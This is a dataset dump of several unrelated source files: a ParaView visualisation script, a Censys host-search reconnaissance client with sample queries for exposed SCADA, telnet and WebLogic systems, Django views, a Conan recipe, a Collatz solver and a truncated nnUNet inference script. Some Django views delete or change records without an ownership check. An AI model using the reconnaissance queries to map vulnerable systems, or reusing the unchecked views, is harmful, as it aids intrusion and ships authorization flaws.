'OpenFOAMReader'\nswBfoam = OpenFOAMReader(FileName='SwB.foam')\nswBfoam.MeshRegions = ['internalMesh']\nswBfoam.CellArrays = ['T', 'p']\nswBfoam.CaseType = 'Decomposed Case'\n\n# get animation scene\nanimationScene1 = GetAnimationScene()\n\n# update animation scene based on data timesteps\nanimationScene1.UpdateAnimationUsingDataTimeSteps()\n\n# get active view\nrenderView1 = GetActiveViewOrCreate('RenderView')\n# default ppi in paraview is 96\nrenderView1.ViewSize = [1800, 1800]\n# Turn off the small axes\nrenderView1.OrientationAxesVisibility = 0\n# Set background color as white\nrenderView1.Background = [1.0, 1.0, 1.0]\n\n######################################################################\n\n# create a new 'Clip' Cut the bottom\nclip1 = Clip(Input=swBfoam)\nclip1.ClipType = 'Plane'\n\n# Properties modified on clip1.ClipType\nclip1.ClipType.Origin = [0.0, 0.0, -0.06]\nclip1.ClipType.Normal = [0.0, 0.0, 1.0]\n\n# create a new 'Clip' Cut the head\nclip2 = Clip(Input=clip1)\nclip2.ClipType = 'Plane'\n\n# Properties modified on clip2.ClipType\nclip2.ClipType.Origin = [0.0, 0.0, 0.12]\nclip2.ClipType.Normal = [0.0, 0.0, -1.0]\n\n# create a new 'Clip' Cylinder\nclip3 = Clip(Input=clip2)\nclip3.ClipType = 'Cylinder'\nclip3.InsideOut = 1\n\n# Properties modified on clip3.ClipType\nclip3.ClipType.Axis = [0.0, 0.0, 1.0]\nclip3.ClipType.Radius = 0.04\n\n# make pressure contour\ncontour1 = Contour(Input=clip3)\ncontour1.ContourBy = ['POINTS', 'p']\ncontour1.Isosurfaces = [101290.]\ncontour1.PointMergeMethod = 'Uniform Binning'\n\n######################################################################\n\n# show data in view\ncontour1Display = Show(contour1, renderView1)\n# trace defaults for the display properties.\ncontour1Display.Representation = 'Surface'\ncontour1Display.ColorArrayName = [None, 'T']\ncontour1Display.SetScaleArray = ['POINTS', 'T']\ncontour1Display.ScaleTransferFunction = 'PiecewiseFunction'\ncontour1Display.OpacityArray = ['POINTS', 'T']\ncontour1Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# set scalar coloring\nColorBy(contour1Display, ('POINTS', 'T'))\n\n# get color transfer function/color map for 'T'\ntLUT = GetColorTransferFunction('T')\ntLUT.RescaleTransferFunction(298., 2200.)\ntLUT.ApplyPreset('2hot', True)\n\n# create a new 'OpenFOAMReader'\nswBWall = OpenFOAMReader(FileName='SwB.foam')\nswBWall.MeshRegions = ['WALL_TUBE_LOW_OUT', 'WALL_QUARL_IN', 'WALL_TUBE_UP']\nswBWall.CellArrays = []\nswBWall.CaseType = 'Decomposed Case'\n\n# show data in view\nswBWallDisplay = Show(swBWall, renderView1)\n# trace defaults for the display properties.\nswBWallDisplay.Representation = 'Surface'\nswBWallDisplay.ColorArrayName = [None, '']\n\n# set scalar coloring\nColorBy(swBWallDisplay, ('FIELD', 'casePath'))\n\n# Properties modified\nswBWallDisplay.Opacity = 0.2\n\n# get color legend/bar for tLUT in view renderView1\ntLUTColorBar = GetScalarBar(tLUT, renderView1)\n\ntLUTColorBar.WindowLocation = 'UpperLeftCorner'\n# remove up and low range labels with different format\ntLUTColorBar.AddRangeLabels = 0\n\ntLUTColorBar.ScalarBarLength = 0.5\ntLUTColorBar.ScalarBarThickness = 48\n\ntLUTColorBar.UseCustomLabels = 1\ntLUTColorBar.CustomLabels = [300., 600., 900., 1200., 1500., 1800., 2100.]\ntLUTColorBar.AutomaticLabelFormat = 1\n#tLUTColorBar.LabelFormat = '%-#4.0f'\n\ntLUTColorBar.Title = 'T (K)'\ntLUTColorBar.ComponentTitle = ''\ntLUTColorBar.TitleFontSize = 60\ntLUTColorBar.TitleFontFamily = 'Times'\ntLUTColorBar.TitleColor = [0.0, 0.0, 0.0]\n\ntLUTColorBar.LabelFontSize = 60\ntLUTColorBar.LabelFontFamily = 'Times'\ntLUTColorBar.LabelColor = [0.0, 0.0, 0.0]\n\n# create a new 'Annotate Time Filter'\nannotateTimeFilter1 = AnnotateTimeFilter(Input=clip3)\n\n# Properties modified on annotateTimeFilter1\nannotateTimeFilter1.Format = 'Time: %.4f s'\n\n# Properties modified on annotateTimeFilter1\nannotateTimeFilter1.Shift = -1.4002\n\n# Properties modified on annotateTimeFilter1\nannotateTimeFilter1.Scale = 1.0\n\n# show data in view\nannotateTimeFilter1Display = Show(annotateTimeFilter1, renderView1)\n\n# Properties modified on annotateTimeFilter1Display\nannotateTimeFilter1Display.Color = [0.0, 0.0, 0.0]\n\n# Properties modified on annotateTimeFilter1Display\nannotateTimeFilter1Display.FontSize = 48\n\n# Properties modified on annotateTimeFilter1Display\n#annotateTimeFilter1Display.WindowLocation = 'UpperCenter'\nannotateTimeFilter1Display.WindowLocation = 'LowerRightCorner'\n\n# camera placement for renderView1\nrenderView1.CameraPosition = [-0.08, 0.0, 0.07]\nrenderView1.CameraFocalPoint = [0.0, 0.0, 0.05]\nrenderView1.CameraViewUp = [0.0, 1.0, 1.0]\nrenderView1.CameraViewAngle = 75\n\n#SaveScreenshot('fig_p.png', \n# renderView1, \n# ImageResolution=[1800, 1800], \n# OverrideColorPalette='WhiteBackground')\n#\n#save animation\nSaveAnimation('vedio_p.png', \n renderView1,\n ImageResolution=[1800, 1800],\n OverrideColorPalette='WhiteBackground',\n FrameRate=24,\n FrameWindow=[0, 499])\n","sub_path":"SwB/plot_single/paraviewShaheen/pv_vedio_contour_p.py","file_name":"pv_vedio_contour_p.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"65912367","text":"# -*- coding: utf-8 -*-\r\n# @aplyc1a。使用前先填入自己的用户名及API-Key\r\nimport json\r\nimport time\r\nimport requests\r\nimport pprint\r\n\r\n'''\r\ncensys网上说一共有以下6种API接口:search、view、report、query、export、data。对普通用户而言,censys有查询限制。\r\n本工具只实现了search接口。search在网页版上提供IP/certificates/website三种检索模式。\r\n分别对应于\r\nhttps://censys.io/api/v1/search/ipv4\r\nhttps://censys.io/api/v1/search/certificates\r\nhttps://censys.io/api/v1/search/website\r\n\r\n下面给出一些支持使用的search关键字:\r\nlocation.country_code: DE\r\nprotocols: (\"23/telnet\" or \"21/ftp\")\r\n80.http.get.headers.server: Apache\r\n80.http.get.status_code: 200\r\n80.http.get.status_code:[400 TO 500]\r\n80.http.get.headers.server:nginx\r\ntags: scada\r\nautonomous_system.description: University\r\nweblogic and location.country_code: CN\r\n23.0.0.0/8 or 8.8.8.0/24\r\n'''\r\n\r\nAPI_URL = \"https://censys.io/api/v1\"\r\nUID = \"\"\r\nSECRET = \"\"\r\n\r\ncolumns = { 'ip' : 'ip', \r\n 'protocols' : 'protocols', \r\n 'country' : 'location.country',\r\n 'city' : 'location.city', \r\n 'country_code' : 'location.country_code',\r\n 'asn' : 'autonomous_system.asn',\r\n 'name' : 'autonomous_system.name',\r\n 'organization' : 'autonomous_system.organization'\r\n}\r\n\r\ndef censys_search(query_key):\r\n page = 1\r\n num_retries = 5\r\n while num_retries > 0:\r\n data = {\r\n \"query\": query_key,\r\n \"page\": page,\r\n \"fields\": [columns['ip'],columns['protocols'],columns['country'],columns['city'], \r\n columns['country_code'],columns['asn'],columns['name'],columns['organization']],\r\n \"flatten\":True\r\n }\r\n try:\r\n res = requests.post(API_URL + \"/search/ipv4\", data=json.dumps(data), auth=(UID, SECRET))\r\n result = res.json()\r\n if result['status'] == 'error':\r\n if \"You have used your full quota for this billing period\" in str(result):\r\n print(\"[-]You have used your full quota for this billing period. Please see https://censys.io/account/billing or contact support@censys.io.\")\r\n break\r\n \r\n #print(result[\"results\"])\r\n #pprint.pprint(result[\"results\"])\r\n #print(result[\"metadata\"])\r\n for i in result[\"results\"]:\r\n \r\n #print(i)\r\n \r\n print(\"\")\r\n pprint.pprint(i)\r\n \r\n # 打印所有的查询结果项\r\n #for j in i.keys():\r\n # print(\"\\\"%s\\\"\\t\" %(i[j]), end=\" \" )\r\n # print(\"\")\r\n \r\n # 只打印 IP和协议\r\n #print(\"%s %s\" %(i[columns['ip']],i[columns['protocols']]))\r\n num_retries = 5\r\n page = page + 1\r\n except Exception as e:\r\n print(e)\r\n num_retries=num_retries-1\r\n\r\nif __name__ == '__main__':\r\n with open(\"censys-item.txt\", 'r', encoding='utf-8') as rf:\r\n for line in rf:\r\n print(\"[censys-Query] => \\\"%s\\\"\" %line.strip('\\n').strip('\\r'))\r\n censys_search(line.strip('\\n').strip('\\r'))\r\n print(\"-\"*80)\r\n #time.sleep(1)\r\n","sub_path":"0x01 信息收集/info-censys.py","file_name":"info-censys.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"200686236","text":"from django.http.request import HttpRequest\nfrom django.db.models.query import EmptyQuerySet\nfrom rest_framework.exceptions import PermissionDenied\n\nfrom .models import AnonymousUserModel\n\n\ndef get_anonymous_identify_model_id(request: HttpRequest) -> str:\n return get_anonymous_identify_model(request).id\n\n\ndef get_anonymous_identify_model(request: HttpRequest) -> AnonymousUserModel:\n ''' The user ID instance is returned. If the user is not registered,\n the identifier must be specified in the path parameters.\n '''\n\n if request.user.is_authenticated:\n object, created = AnonymousUserModel.objects.get_or_create(\n user=request.user)\n return object\n\n identifier = request.GET.get('identifier')\n\n if identifier:\n object, created = AnonymousUserModel.objects.get_or_create(\n identifier=identifier)\n else:\n raise PermissionDenied(\n detail='Please add AnonymousUserID to URL parameters',\n code=410)\n\n return object\n\n\ndef build_survey_tree_by_answers(queryset: EmptyQuerySet) -> dict:\n ''' Build tree like this:\n\n survey:\n question:\n answer\n question:\n answer\n '''\n\n surveys = {}\n\n for answer in queryset:\n _dict_question = {\n 'text': answer.question.text,\n }\n\n if answer.text:\n _dict_question['answer_text'] = answer.text\n\n list_choices_user = []\n for selected in answer.selected_choices.all():\n list_choices_user.append(selected.choice_text)\n\n if list_choices_user:\n _dict_question['choices'] = list_choices_user\n\n survey = answer.question.survey\n\n try:\n _tmp = surveys['%d' % survey.id]['questions']\n _tmp.append(_dict_question)\n except KeyError:\n surveys['%d' % survey.id] = {\n 'name': survey.name,\n 'description': survey.description,\n 'info': survey.dates_info,\n 'questions': [_dict_question]\n }\n\n return surveys","sub_path":"project/api/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"632669952","text":"import os\n\n\nfrom conans import tools, python_requires\npyreq = python_requires(\"pyreq/1.0.0@tdelame/stable\")\n\nclass LZMA(pyreq.BaseConanFile):\n description = \"LZMA library is part of XZ Utils\"\n url = \"https://tukaani.org\"\n license = \"Public Domain\"\n \n name = \"lzma\"\n version = \"5.2.4\"\n settings = \"os\"\n\n def config_options(self):\n \"\"\"Executed before the actual assignment of options. Use it to configure or constrain\n the available options in a package. You can read values of self.settings but you cannot\n read values of self.options.\"\"\" \n if self.settings.os != \"Linux\":\n raise RuntimeError(\"lzma recipe is not available yet for your OS\")\n\n def source(self):\n \"\"\"Retrieve source code.\"\"\"\n directory = \"xz-{}\".format(self.version)\n self.download(\"https://tukaani.org/xz\", directory=directory)\n\n def build(self):\n \"\"\"Build the elements to package.\"\"\"\n arguments = [\n '--disable-xz', '--disable-xzdec', '--disable-lzmadec',\n '--disable-lzmainfo', '--disable-scripts', '--disable-doc']\n self.build_autotools(arguments)\n\n def package_info(self):\n \"\"\"Edit package info.\"\"\"\n super(LZMA, self).package_info()\n if not self.options.shared:\n self.cpp_info.defines.append('LZMA_API_STATIC')\n self.cpp_info.libs = [\"lzma\"]\n ","sub_path":"lzma/lzma-5.2.4.py","file_name":"lzma-5.2.4.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"577584505","text":"def collatz(n, cache={}):\n n_org = n\n cnt = 1\n while n != 1:\n cnt += 1\n\n if n in cache:\n cnt += cache[n] - 1\n n = 1\n\n elif n % 2 == 0:\n n = int(n / 2)\n\n else:\n n = 3 * n + 1\n cache[n_org] = cnt - 1\n return cnt\n\n\nmax_i = 0\nmax_n = 0\nfor i in range(500_000, 1_000_000): # since n -> n/2, we know doubling a value extends it\n n = collatz(i)\n if n > max_n:\n max_i, max_n = i, n\nprint(max_i)\n","sub_path":"11-20/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479243439","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.contrib.auth import login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom accounts.models import Accounts, Advertisements\nfrom organisation.models import Organisations\nfrom teams.models import Teams\nfrom sports.models import Sports\nfrom accounts.accountFunctions import *\nimport datetime\nfrom .filters import AdvertisementsOwnFilter\n\nlogin_path = \"/accounts/login\"\ndef signup_view(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n newAccount = Accounts(accountName = request.POST['username'], userInstance = user) #This creates the Account model, has extended fields to the User model\n newAccount.save()\n login(request, user)\n return redirect('accounts:accountEdit',request.POST['username'] )\n else:\n form = UserCreationForm()\n return render(request, 'accounts/signup.html', { 'form': form })\n\ndef login_view(request):\n if request.method == 'POST':\n form = AuthenticationForm(data=request.POST)\n if form.is_valid():\n # log the user in\n user = form.get_user()\n login(request, user)\n if 'next' in request.POST:\n return redirect(request.POST.get('next'))\n else:\n return redirect('articles:list')\n else:\n form = AuthenticationForm()\n return render(request, 'accounts/login.html', { 'form': form })\n\n@login_required(login_url=\"/accounts/login\")\ndef logout_view(request):\n #if request.method == 'POST':\n logout(request)\n return redirect('articles:list')\n\n@login_required(login_url=login_path)\ndef account(request, accountName):\n try:\n accountInstance = Accounts.objects.get(accountName = accountName)\n except:\n return render(request, 'accounts/noAccount.html')\n\n accountInfo = {'name':accountName,'accountID':accountInstance.id, 'accountDescription':accountInstance.description,\n 'gender':accountInstance.gender, 'accountInstance':accountInstance}\n return render(request, 'accounts/account.html', accountInfo)\n\n\n@login_required(login_url=login_path)\ndef accountEdit(request, accountName):\n #try:\n genderList = ['Male', 'Female', 'Other']\n accountInstance = Accounts.objects.get(accountName = accountName)\n accountInfo = {'name':accountName,'accountID':accountInstance.id, 'accountDescription':accountInstance.description,\n 'gender':accountInstance.gender, 'accountInstance':accountInstance,'genderList':genderList}\n\n\n\n\n\n #except:\n #return render(request, 'accounts/noAccount.html')\n return render(request, 'accounts/edit.html', accountInfo)\n\n@login_required(login_url=login_path)\ndef accountEditMedium(request, accountName):\n if request.user.username == accountName:\n #this method is for when you are on the edit page, and this updates the database\n\n if request.method == 'POST':\n\n changingAccount = Accounts.objects.get(accountName = accountName)\n\n changingAccount.first_name = request.POST['First_Name']\n changingAccount.last_name = request.POST['Last_Name']\n changingAccount.phone_number = request.POST['Phone']\n changingAccount.gender = request.POST['Gender']\n changingAccount.email = request.POST['Email']\n changingAccount.description = request.POST['Description']\n changingAccount.save()\n\n\n updateAccountAds(changingAccount)\n updateAccountTeams(changingAccount)\n \n return redirect('accounts:account', accountName)\n\n\n@login_required(login_url=login_path)\ndef accountAdvertisements(request, accountName):\n advertisementList = Advertisements.objects.filter(owner = Accounts.objects.get(accountName = accountName).id).all()\n print(\"sport\")\n print(advertisementList[0].sport)\n\n myFilter = AdvertisementsOwnFilter(request.GET, queryset = advertisementList)\n advertisementList = myFilter.qs\n print(\"my filter\")\n print(myFilter)\n\n return render(request, 'accounts/viewOwnAdvertisements.html', {'advertisementList':advertisementList, 'accountName':accountName, 'myFilter':myFilter})\n\n@login_required(login_url=login_path)\ndef accountTeams(request, accountName):\n\n teamsList = Teams.objects.filter(owner = Accounts.objects.get(accountName = accountName).id).all()\n return render(request, 'accounts/viewOwnTeams.html', {'teamsList':teamsList, 'accountName':accountName})\n\n@login_required(login_url=login_path)\ndef accountOrganisations(request, accountName):\n\n orgsList = Organisations.objects.filter(owner = Accounts.objects.get(accountName = accountName).id).all()\n return render(request, 'accounts/viewOwnOrganisations.html', {'orgsList':orgsList, 'accountName':accountName})\n\n@login_required(login_url=login_path)\ndef accountOrganisationsDelete(request, accountName, orgID):\n\n Organisations.objects.get(id=orgID).delete()\n\n return redirect('accounts:accountTeams', accountName)\n return render(request, 'accounts/viewOwnOrganisations.html', {'orgsList':orgsList, 'accountName':accountName})\n\n\n\n\n@login_required(login_url=login_path)\ndef accountOrganisationsEdit(request, accountName):\n\n orgsList = Organisations.objects.filter(owner = Accounts.objects.get(accountName = accountName).id).all()\n return render(request, 'accounts/viewOwnOrganisations.html', {'orgsList':orgsList, 'accountName':accountName})\n\n\n@login_required(login_url=login_path)\ndef accountTeamsEdit(request, accountName, teamID):\n\n sportsList = Sports.objects.all()\n team = Teams.objects.get(id = teamID)\n startHour = converTimeToClockTime(team.startTimeRange.hour)\n startMinute = converTimeToClockTime(team.startTimeRange.minute)\n endHour = converTimeToClockTime(team.endTimeRange.hour)\n endMinute = converTimeToClockTime(team.endTimeRange.minute)\n return render(request, 'accounts/editTeam.html', {'team': team, 'sportsList':sportsList, 'accountName':accountName,\n 'startHour':startHour, 'startMinute':startMinute, 'endHour':endHour, 'endMinute':endMinute,\n 'listOfDaysInWeek':listOfDaysInWeek, 'listOfGenderOptions':listOfGenderOptions})\n\n@login_required(login_url=login_path)\ndef accountTeamsEditMedium(request, accountName, teamID):\n if request.user.username == Teams.objects.get(id=teamID).owner.accountName:\n team = Teams.objects.get(id = teamID)\n\n nameOfOrg = request.POST['organisationName']\n postName = request.POST['fname']\n firstTime = request.POST['start-time'].split(':',2)\n lastTime = request.POST['end-time'].split(':',2)\n sport = request.POST['Sport']\n team.teamName = postName\n team.day = request.POST['Days']\n team.location = request.POST['teamLocation']\n team.lengthOfGame = request.POST['lengthOfGame']\n team.startTimeRange = datetime.time(int(firstTime[0]), int(firstTime[1]), 0)\n team.endTimeRange = datetime.time(int(lastTime[0]), int(lastTime[1]), 0)\n team.owner = Accounts.objects.get(accountName = request.user.username)\n team.sport = sport\n team.currentNumPlayers = request.POST['currentPlayers']\n team.lookingNumPlayers = request.POST['lookingPlayers']\n team.lookingGenderPlayers = request.POST['genderRequirements']\n team.notes = request.POST['Notes']\n team.save()\n print(\"team edited successfully\")\n else:\n print(\"team not edited successfully\")\n return redirect('accounts:accountTeams', accountName)\n\n@login_required(login_url=login_path)\ndef accountTeamsDelete(request, accountName, teamID):\n\n team = Teams.objects.get(id = teamID)\n teamsList = Teams.objects.filter(owner = Accounts.objects.get(accountName = accountName).id).all()\n return render(request, 'accounts/deleteTeam.html', {'teamsList':teamsList, 'team':team, 'accountName':accountName})\n\n@login_required(login_url=login_path)\ndef accountTeamsDeleteMedium(request, accountName, teamID):\n if request.user.username == Teams.objects.get(id=teamID).owner.accountName:\n Teams.objects.get(id=teamID).delete()\n print(\"Team deleted\")\n else:\n print(\"team not deleted\")\n return redirect('accounts:accountTeams', accountName)\n\n@login_required(login_url=login_path)\ndef accountAdEdit(request, accountName, adID):\n ad = Advertisements.objects.get(id = adID)\n days = ad.days\n sports = ad.sport\n print('ad days')\n print(ad.days)\n print('ad sport')\n print(ad.sport)\n print(days)\n print(listOfDaysInWeek)\n sportsList = Sports.objects.all()\n startHour = converTimeToClockTime(ad.EarliestTime.hour)\n startMinute = converTimeToClockTime(ad.EarliestTime.minute)\n endHour = converTimeToClockTime(ad.LatestTime.hour)\n endMinute = converTimeToClockTime(ad.LatestTime.minute)\n return render(request, 'accounts/editAd.html', {'ad': ad,'selectedSports':sports, 'sportsList':sportsList, 'accountName':accountName,\n 'startHour':startHour, 'startMinute':startMinute, 'endHour':endHour, 'endMinute':endMinute, 'days':days,'listOfDaysInWeek':listOfDaysInWeek})\n\n@login_required(login_url=login_path)\ndef accountAdEditMedium(request, accountName, adID):\n if request.user.username == Advertisements.objects.get(id=adID).owner.accountName:\n print(\"Form in medium\")\n print(request.POST)\n ad = Advertisements.objects.get(id = adID)\n notes = request.POST['Notes']\n ad.notes = notes\n ad.save()\n print(\"account eddited succesfully\")\n else:\n print(\"account did not edit succesfully\")\n return redirect('accounts:accountAdvertisements', accountName)\n\n@login_required(login_url=login_path)\ndef accountAdDelete(request, accountName, adID):\n\n ad = Advertisements.objects.get(id = adID)\n return render(request, 'accounts/deleteAd.html', {'ad':ad, 'accountName':accountName})\n\n@login_required(login_url=login_path)\ndef accountAdDeleteMedium(request, accountName, adID):\n if request.user.username == Advertisements.objects.get(id=adID).owner.accountName:\n Advertisements.objects.get(id=adID).delete()\n print(\"ad deleted\")\n else:\n print(\"ad not deleted\")\n return redirect('accounts:accountAdvertisements', accountName)\n\n\n@login_required(login_url=\"/accounts/login/\")\ndef organisationDelete(request, accountName, orgID):\n org = Organisations.objects.get(id=orgID)\n return render(request, 'accounts/deleteOrganisation.html', {'org':org, 'accountName':accountName})\n\n@login_required(login_url=\"/accounts/login/\")\ndef organisationDeleteMedium(request, accountName, orgID):\n if request.user.username == Organisations.objects.get(id=orgID).owner.accountName:\n #Only creator of an org can delete it\n Organisations.objects.get(id=orgID).delete()\n\n\n try:\n return redirect('accounts:accountOrganisations', request.user.username)\n except:\n return redirect('articles:list')\n\n\n@login_required(login_url=login_path)\ndef organisationEdit(request, accountName, orgID):\n print(\"we are in making org - not in medium\")\n org = Organisations.objects.get(id=orgID)\n print(org)\n print(org.id)\n print(org.OrganisationName)\n # return HttpResponse('homepage')\n return render(request, 'accounts/editOrganisation.html', {'org':org})\n\n@login_required(login_url=login_path)\ndef organisationEditMedium(request, accountName, orgID):\n nameOfOrg = 'test'\n\n if request.method == 'POST':\n try:\n oldOrg = Organisations.objects.get(id = orgID)\n if request.user.username == oldOrg.owner.accountName:\n newOrg = Organisations(id = orgID)\n print(newOrg)\n print(request.POST)\n print(\"here 1\")\n nameOfOrg = request.POST['orgName']\n newOrg.OrganisationName = nameOfOrg\n print(\"here 2\")\n newOrg.CompetitionRegistrationLink = request.POST['Registration_Link']\n print(\"here 3\")\n newOrg.owner = Accounts.objects.get(accountName = accountName)\n newOrg.save()\n\n except Exception as e:\n print(e)\n print(\"Exception, not making org\")\n print(\"It is not making an Org\")\n return render(request, 'organisation/OrgMakingFail.html')\n\n return redirect('accounts:accountOrganisations', request.user.username)\n","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"181641592","text":"from glob import glob\nimport SimpleITK as sitk\nimport numpy as np\nfrom scipy.ndimage.filters import gaussian_filter\nfrom typing import Union, Tuple, List\nimport torch\nimport torch.nn as nn\nfrom generic_UNet import InitWeights_He\nimport pickle\nimport os\nimport torch.nn.functional as F\nfrom generic_UNet import Generic_UNet\n\nprefix = \"version5\"\n\nplanfile = \"/data/nnUNetFrame/DATASET/nnUNet_trained_models/nnUNet/3d_fullres/Task002_ABDSeg/nnUNetTrainer__nnUNetPlansv2.1/plans.pkl\"\nmodelfile = \"/data/nnUNetFrame/DATASET/nnUNet_trained_models/nnUNet/3d_fullres/Task002_ABDSeg/nnUNetTrainer__nnUNetPlansv2.1/all/model_final_checkpoint.model\"\nrawfs = glob(\"/home/SENSETIME/luoxiangde.vendor/Projects/ABDSeg/data/ABDSeg/data/imagesTs/*.nii.gz\")\n\ninfo = pickle.load(open(planfile, \"rb\"))\nplan_data = {}\nplan_data[\"plans\"] = info\nprint(plan_data)\n\n\ndef recycle_plot(data, prefix):\n for k, v in data.items():\n if isinstance(v, dict):\n if isinstance(k, int):\n k = \"%d\" % k\n recycle_plot(v, prefix + \"->\" + k)\n else:\n print(prefix, k, v)\n\n\nprint(\"hello\")\nresolution_index = 1\nnum_classes = plan_data['plans']['num_classes']\nbase_num_features = plan_data['plans']['base_num_features']\npatch_size = plan_data['plans']['plans_per_stage'][resolution_index]['patch_size']\npool_op_kernel_sizes = plan_data['plans']['plans_per_stage'][resolution_index]['pool_op_kernel_sizes']\nconv_kernel_sizes = plan_data['plans']['plans_per_stage'][resolution_index]['conv_kernel_sizes']\ncurrent_spacing = plan_data['plans']['plans_per_stage'][resolution_index]['current_spacing']\n# current_spacing = [i * 2 for i in current_spacing]\nprint(current_spacing)\nmean = plan_data['plans']['dataset_properties']['intensityproperties'][0]['mean']\nstd = plan_data['plans']['dataset_properties']['intensityproperties'][0]['sd']\nclip_min = plan_data['plans']['dataset_properties']['intensityproperties'][0]['percentile_00_5']\nclip_max = plan_data['plans']['dataset_properties']['intensityproperties'][0]['percentile_99_5']\n\nnorm_op_kwargs = {'eps': 1e-5, 'affine': True}\ndropout_op_kwargs = {'p': 0, 'inplace': True}\nnet_nonlin = nn.LeakyReLU\nnet_nonlin_kwargs = {'negative_slope': 1e-2, 'inplace': True}\n\nnet = Generic_UNet(1, base_num_features, num_classes + 1, len(pool_op_kernel_sizes), 2, 2,\n nn.Conv3d, nn.InstanceNorm3d, norm_op_kwargs, nn.Dropout3d,\n dropout_op_kwargs, net_nonlin, net_nonlin_kwargs, False, False, lambda x: x,\n InitWeights_He(1e-2), pool_op_kernel_sizes, conv_kernel_sizes, False, True, True)\n\n# print(net)\n\nnet.cuda()\ncheckpoint = torch.load(modelfile)\nweights = checkpoint['state_dict']\nnet.load_state_dict(weights, strict=False)\nnet.eval()\nnet.half()\n\n\n# summary(net, (1, 80, 160, 192), batch_size=1)\n\n\ndef _get_arr(path):\n sitkimg = sitk.ReadImage(path)\n arr = sitk.GetArrayFromImage(sitkimg)\n return arr, sitkimg\n\n\ndef _write_arr(arr, path, info=None):\n sitkimg = sitk.GetImageFromArray(arr)\n if info is not None:\n sitkimg.CopyInformation(info)\n sitk.WriteImage(sitkimg, path)\n\n\ndef get_do_separate_z(spacing, anisotropy_threshold=2):\n # do_separate_z = (np.max(spacing) / np.min(spacing)) > anisotropy_threshold\n do_separate_z = spacing[-1] > anisotropy_threshold\n return do_separate_z\n\n\ndef _compute_steps_for_sliding_window(patch_size: Tuple[int, ...],\n image_size: Tuple[int, ...],\n step_size: float) -> List[List[int]]:\n assert [i >= j for i, j in zip(image_size, patch_size)], \"image size must be as large or larger than patch_size\"\n assert 0 < step_size <= 1, 'step_size must be larger than 0 and smaller or equal to 1'\n\n # our step width is patch_size*step_size at most, but can be narrower. For example if we have image size of\n # 110, patch size of 32 and step_size of 0.5, then we want to make 4 steps starting at coordinate 0, 27, 55, 78\n target_step_sizes_in_voxels = [i * step_size for i in patch_size]\n\n num_steps = [int(np.ceil((i - k) / j)) + 1 for i, j, k in zip(image_size, target_step_sizes_in_voxels, patch_size)]\n\n steps = []\n for dim in range(len(patch_size)):\n # the highest step value for this dimension is\n max_step_value = image_size[dim] - patch_size[dim]\n if num_steps[dim] > 1:\n actual_step_size = max_step_value / (num_steps[dim] - 1)\n else:\n actual_step_size = 99999999999 # does not matter because there is only one step at 0\n\n steps_here = [int(np.round(actual_step_size * i)) for i in range(num_steps[dim])]\n\n steps.append(steps_here)\n\n return steps\n\n\ndef _get_gaussian(patch_size, sigma_scale=1. / 8) -> np.ndarray:\n tmp = np.zeros(patch_size)\n center_coords = [i // 2 for i in patch_size]\n sigmas = [i * sigma_scale for i in patch_size]\n tmp[tuple(center_coords)] = 1\n gaussian_importance_map = gaussian_filter(tmp, sigmas, 0, mode='constant', cval=0)\n gaussian_importance_map = gaussian_importance_map / np.max(gaussian_importance_map) * 1\n gaussian_importance_map = gaussian_importance_map.astype(np.float32)\n # gaussian_importance_map cannot be 0, otherwise we may end up with nans!\n gaussian_importance_map[gaussian_importance_map == 0] = np.min(\n gaussian_importance_map[gaussian_importance_map != 0])\n return gaussian_importance_map\n\n\ngaussian_mask = torch.from_numpy(_get_gaussian(patch_size)[np.newaxis, np.newaxis]).cuda().half().clamp_min_(1e-4)\n\n\ndef predict(arr):\n prob_map = torch.zeros((1, num_classes + 1,) + arr.shape).half().cuda()\n arr_clip = np.clip(arr, clip_min, clip_max)\n raw_norm = (arr_clip - mean) / std\n print(raw_norm.shape)\n\n steps = _compute_steps_for_sliding_window(patch_size, raw_norm.shape, 0.7)\n num_tiles = len(steps[0]) * len(steps[1]) * len(steps[2])\n if 1:\n print(\"data shape:\", raw_norm.shape)\n print(\"patch size:\", patch_size)\n print(\"steps (x, y, and z):\", steps)\n print(\"number of tiles:\", num_tiles)\n\n for x in steps[0]:\n lb_x = x\n ub_x = x + patch_size[0]\n for y in steps[1]:\n lb_y = y\n ub_y = y + patch_size[1]\n for z in steps[2]:\n lb_z = z\n ub_z = z + patch_size[2]\n with torch.no_grad():\n tensor_arr = torch.from_numpy(\n raw_norm[lb_x:ub_x, lb_y:ub_y, lb_z:ub_z][np.newaxis, np.newaxis]).cuda().half()\n seg_pro = net(tensor_arr)\n print(np.mean(raw_norm), torch.mean(tensor_arr))\n _pred = seg_pro * gaussian_mask\n prob_map[:, :, lb_x:ub_x, lb_y:ub_y, lb_z:ub_z] += _pred\n torch.cuda.empty_cache()\n return prob_map.detach().cpu()\n\n\ndef itk_change_spacing(src_itk, output_spacing, interpolate_method='Linear'):\n assert interpolate_method in ['Linear', 'NearestNeighbor']\n src_size = src_itk.GetSize()\n src_spacing = src_itk.GetSpacing()\n\n re_sample_scale = tuple(np.array(src_spacing) / np.array(output_spacing).astype(np.float))\n re_sample_size = tuple(np.array(src_size).astype(np.float) * np.array(re_sample_scale))\n\n re_sample_size = [int(round(x)) for x in re_sample_size]\n output_spacing = tuple((np.array(src_size) / np.array(re_sample_size)) * np.array(src_spacing))\n\n re_sampler = sitk.ResampleImageFilter()\n 